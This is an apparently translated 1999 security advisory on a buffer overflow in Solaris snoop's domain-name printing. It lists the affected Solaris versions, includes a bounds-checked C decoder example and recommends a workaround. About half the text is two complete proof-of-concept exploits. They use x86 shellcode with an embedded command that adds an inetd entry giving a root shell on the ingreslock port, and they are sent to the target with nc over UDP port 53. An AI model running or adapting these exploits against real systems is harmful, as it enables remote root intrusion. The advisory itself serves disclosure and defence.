
Security Vulnerability
snoop (print_domain_name) Buffer Overflow

Published: 1999-12-07
Updated: 1999-12-09

Affected systems:
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5.1_x86
Sun Solaris 2.5.1
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.3
Description:
Snoop is a tcpdump-like program used to examine network traffic. In its print_domain_name function, a domain name longer than 1024 bytes overflows a buffer. By exploiting this overflow, an attacker can remotely gain access to the system with the privileges of the user running snoop (usually root).
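The defect described above, illustrated by an added example that is neither Sun's snoop source nor code from this advisory: a DNS name decoder that writes into a fixed 1024-byte buffer (the size given in the description) but checks every label against the remaining space and rejects names that would not fit, instead of copying them unchecked. The function names decode_domain_name_safe and build_long_name and the constructed inputs are assumptions of this example, and compression pointers are rejected rather than followed, a simplification that real snoop does not make.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF 1024   /* fixed buffer size cited by the advisory */

/* Decode a DNS wire-format name at pkt[off] into out[NAME_BUF] as a dotted,
 * NUL-terminated string. Returns the decoded length, or -1 if the name would
 * not fit, the packet is truncated, or a label is malformed (compression
 * pointers are rejected here: a simplification of this example). */
int decode_domain_name_safe(const unsigned char *pkt, size_t pktlen,
                            size_t off, char out[NAME_BUF])
{
    size_t pos = 0;
    while (off < pktlen) {
        unsigned len = pkt[off++];
        if (len == 0) {                        /* root label ends the name */
            out[pos] = '\0';
            return (int)pos;
        }
        if (len & 0xC0)               return -1;  /* pointer/reserved label */
        if (off + len > pktlen)       return -1;  /* label runs past packet */
        if (pos + len + 2 > NAME_BUF) return -1;  /* label + '.' + NUL must fit */
        memcpy(out + pos, pkt + off, len);     /* bounded by the check above */
        pos += len; off += len;
        out[pos++] = '.';
    }
    return -1;  /* packet ended before the terminating zero-length label */
}

/* Constructed input: n labels of 63 'a' bytes, then the root label. */
size_t build_long_name(unsigned char *buf, size_t buflen, int n)
{
    size_t pos = 0;
    if ((size_t)n * 64 + 1 > buflen) return 0;   /* would not fit in buf */
    for (int i = 0; i < n; i++) {
        buf[pos++] = 63; memset(buf + pos, 'a', 63); pos += 63;
    }
    buf[pos++] = 0;
    return pos;
}

int main(void)
{
    static const unsigned char ok[] = "\3www\7example\3com";  /* NUL = root */
    unsigned char wire[2048]; char name[NAME_BUF];
    size_t n = build_long_name(wire, sizeof wire, 20);   /* 1260 chars > 1024 */
    printf("normal -> %d, oversized -> %d\n", decode_domain_name_safe(ok, sizeof ok, 0, name), decode_domain_name_safe(wire, n, 0, name));
    return 0;
}
```

A name of 15 maximal labels (960 characters plus the terminator) still fits; the 16th label is refused because label, dot and NUL would need 1025 bytes.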

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Users proceed at their own risk!

Two versions of the proof-of-concept program have been published:

(1) Requires snoop to be running with the -v option.

/*

Remote Solaris 2.7 x86 snoop exploit
Run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop -v"
Thanks str/horizon for shellcodes (hi plaguez)

*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

char buffer[SIZE];
const char x86_nop=0x90;
long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;

int main (int argc, char *argv[])
{
int i;

if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtoul(argv[2], NULL, 0);

memset(buffer, x86_nop, SIZE);
memcpy(buffer+nop, shell, strlen(shell));

for (i = nop+strlen(shell); i < SIZE-4; i += 4)
*((int *) &buffer[i]) = esp+offset;

fprintf(stderr,"0x%x\n", esp+offset);
printf("%s", buffer);

return 0;
}

(2) Only requires snoop to be running.

/*

by: K2,
version .2
this is a funny Solaris.
remote Solaris 2.7 x86 snoop exploit
rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW
run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop"
verified with patch 108483-01
thx str/horizon for shellcodes.Hi plageuz
Hi mom.

*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock"
"stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;"
"/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

const char x86_nop=0x90;
long nop=NOPDEF,esp=0x804646c;
long offset=DEFOFF;

char buffer[SIZE];

int main (int argc, char *argv[]) {
int i;

if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtoul(argv[2], NULL, 0);

memset(buffer, x86_nop, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < SIZE-4; i += 4) {
*((int *) &buffer[i]) = esp+offset;

}

fprintf(stderr,"0x%x\n",esp+offset);
printf("%s", buffer);

return 0;
}

Recommendation:
As a temporary workaround, stop using snoop, or use tcpdump instead.
(Note: the snoop patch released by Sun does not address this problem.)

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.